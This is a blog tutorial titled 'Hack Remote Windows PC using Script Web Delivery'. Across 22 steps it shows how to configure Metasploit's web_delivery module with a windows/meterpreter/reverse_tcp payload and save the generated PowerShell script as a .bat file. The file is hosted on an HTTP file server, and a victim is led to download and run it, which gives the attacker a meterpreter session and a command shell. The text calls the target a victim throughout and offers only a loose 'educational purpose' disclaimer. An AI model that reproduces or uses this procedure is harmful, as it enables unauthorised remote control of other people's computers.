Hack Remote Windows PC using Script Web Delivery


Metasploits Web Delivery Script is a versatile module that creates a server on the attacking machine which hosts a payload. When the victim connects to the attacking server, the payload will be executed on the victim machine.

This exploit requires a method of executing commands on the victim machine. In particular you must be able to reach the attacking machine from the victim. Remote command execution is a great example of an attack vector where using this module is possible. The web delivery script works on php, python, and powershell based applications.


Lets Start Hack Remote Windows PC using Script Web Delivery - Kali Linux


Step 1 : First get your ip address with ifconfig command

Hack Remote Windows PC using Script Web Delivery


Step 2 : Open MetaSploit with msfconsole command

Hack Remote Windows PC using Script Web Delivery


Step 3 : Search web_delivery

Hack Remote Windows PC using Script Web Delivery


Step 4 : use exploit/multi/script/web_delivery

Hack Remote Windows PC using Script Web Delivery


Step 5 : Now Type Options

Hack Remote Windows PC using Script Web Delivery


Step 6 : set payload windows/meterpreter/reverse_tcp

Next, we need to set the LHOST and LPORT exactly like we did with the Unix/Linux/OS X web delivery exploit.


Hack Remote Windows PC using Script Web Delivery


Step 7 : set lhost 192.168.18.132 [Kali IP Address as per step 1]

Hack Remote Windows PC using Script Web Delivery


Step 8 : set lport 4466

Hack Remote Windows PC using Script Web Delivery


Step 9 : Type, show targets

Hack Remote Windows PC using Script Web Delivery


Step 10 : set target 2

With the target set to 2, Metasploit will create a PowerShell script when we are ready to exploit.


Hack Remote Windows PC using Script Web Delivery


Step 11 : Now type, run

Hack Remote Windows PC using Script Web Delivery


Step 12 : Now copy the web delivery Script.

Hack Remote Windows PC using Script Web Delivery


Step 13 : And paste it Leafpad.

Hack Remote Windows PC using Script Web Delivery


Step 14 : And save at (fileName.bat).

Here i have saved a file on my kali Linux Desktop with name MetaSploit.bat


Hack Remote Windows PC using Script Web Delivery

Step 15 : Share a file with HFS (HTTP file Sever)

HFS(HTTP file Sever) is default installed in Latest kali linux,if not installed,visit our article

How to send or receive files in Kali Linux - Using HFS(HTTP File Server)


Hack Remote Windows PC using Script Web Delivery


Step 16 : Open the Kali Linux ip on victim PC (Window PC/target PC) in browser.

Hack Remote Windows PC using Script Web Delivery


Step 17 : Download the file and run it.

Hack Remote Windows PC using Script Web Delivery


Step 18 : When you run the file on victim PC ,they will be Hacked by you on Kali Linux(Sessions will come on terminal)


A meterpreter session open!


Hack Remote Windows PC using Script Web Delivery


Step 19 : Now type, sessions to list the active sessions

Hack Remote Windows PC using Script Web Delivery


Step 20 : Connect to it with sessions 1

Hack Remote Windows PC using Script Web Delivery


Step 21 : We now have a full Meterpreter shell to the target.Now the session has opened type sysinfo to get system information


Meterpreter is an advanced, dynamically extensible payload that uses in-memory DLL injection stagers and is extended over the network at runtime.


Hack Remote Windows PC using Script Web Delivery


Step 22 : And type shell to enter into Victims command prompt.

Hack Remote Windows PC using Script Web Delivery


For References :-




I hope you enjoyed this article.


Sharing is caring

google
linkedin

About Author

Akash is a co-founder and an aspiring entrepreneur who keeps a close eye on open source, tech giants, and security. Get in touch with him by sending an email (akashchugh1994@gmail.com).


You may also like :-




Leave a Comment

Your email address will not be published. Required fields are marked *




Popular Posts

Who Should Read TechTrick?

All the tricks and tips that TechTrick provides only for educational purpose. If you choose to use the information in TechTrick to break into computer systems maliciously and without authorization, you are on your own. Neither I (TechTrick Admin) nor anyone else associated with TechTrick shall be liable. We are not responsibe for any issues that caused due to informations provided here. So, Try yourself and see the results. You are not losing anything by trying... We are humans, Mistakes are quite natural. Here on TechTrick also have many mistakes..